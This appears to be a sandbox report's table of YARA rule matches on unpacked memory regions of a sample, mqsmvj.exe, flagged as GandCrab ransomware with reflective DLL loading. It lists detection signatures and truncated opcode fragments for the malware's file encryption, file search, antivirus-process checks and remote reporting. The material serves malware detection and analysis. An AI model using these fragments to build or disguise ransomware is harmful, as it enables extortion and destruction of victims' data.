19.3.mqsmvj.exe.3930000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
16.3.mqsmvj.exe.3b50000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
16.3.mqsmvj.exe.3b50000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
16.3.mqsmvj.exe.3b50000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
16.3.mqsmvj.exe.3b50000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
16.3.mqsmvj.exe.3b50000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
16.3.mqsmvj.exe.3b50000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
23.3.mqsmvj.exe.3a70000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
23.3.mqsmvj.exe.3a70000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
23.3.mqsmvj.exe.3a70000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
23.3.mqsmvj.exe.3a70000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
23.3.mqsmvj.exe.3a70000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
23.3.mqsmvj.exe.3a70000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
15.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
15.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
15.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
15.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
15.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
15.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
30.3.mqsmvj.exe.3470000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
30.3.mqsmvj.exe.3470000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
30.3.mqsmvj.exe.3470000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
30.3.mqsmvj.exe.3470000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
30.3.mqsmvj.exe.3470000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
30.3.mqsmvj.exe.3470000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
16.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
16.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
16.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
16.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
16.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
16.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
27.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
27.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
27.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
27.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
27.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
27.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
27.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
3.3.mqsmvj.exe.3790000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
3.3.mqsmvj.exe.3790000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
3.3.mqsmvj.exe.3790000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
3.3.mqsmvj.exe.3790000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
3.3.mqsmvj.exe.3790000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
3.3.mqsmvj.exe.3790000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
25.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
25.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
25.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
25.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
25.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
25.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
30.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
30.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
30.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
30.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
30.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
30.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
30.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
12.3.mqsmvj.exe.2fb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
12.3.mqsmvj.exe.2fb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
12.3.mqsmvj.exe.2fb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
12.3.mqsmvj.exe.2fb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
12.3.mqsmvj.exe.2fb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
12.3.mqsmvj.exe.2fb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
15.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
15.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
15.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
